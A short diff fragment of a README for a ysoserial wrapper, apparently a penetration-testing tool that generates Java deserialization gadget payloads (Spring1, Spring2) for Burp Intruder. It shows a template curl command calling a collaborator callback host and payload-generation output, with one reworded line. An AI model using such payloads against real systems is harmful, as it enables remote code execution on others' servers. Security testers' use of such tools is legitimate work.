B3XAL/ysoserial-wrapper/README.md

 ```
 curl <collaborator_payload>/[payload_name]
 ```
-and copy them to clipboard:
+and then displays them in order to copy the required payloads to your intruder:
 ```
 [+]		Generating Spring1 payload ...
 [+]		Generating Spring2 payload ...